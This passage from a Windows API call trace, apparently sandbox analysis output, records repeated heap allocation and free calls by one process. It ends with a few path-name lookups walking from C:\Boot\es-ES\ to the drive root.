Flags=0x0, Size=0x20) returned 0x31ef590 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.046] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0093.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.046] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.046] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.046] PathFindFileNameW (pszPath="") returned="" 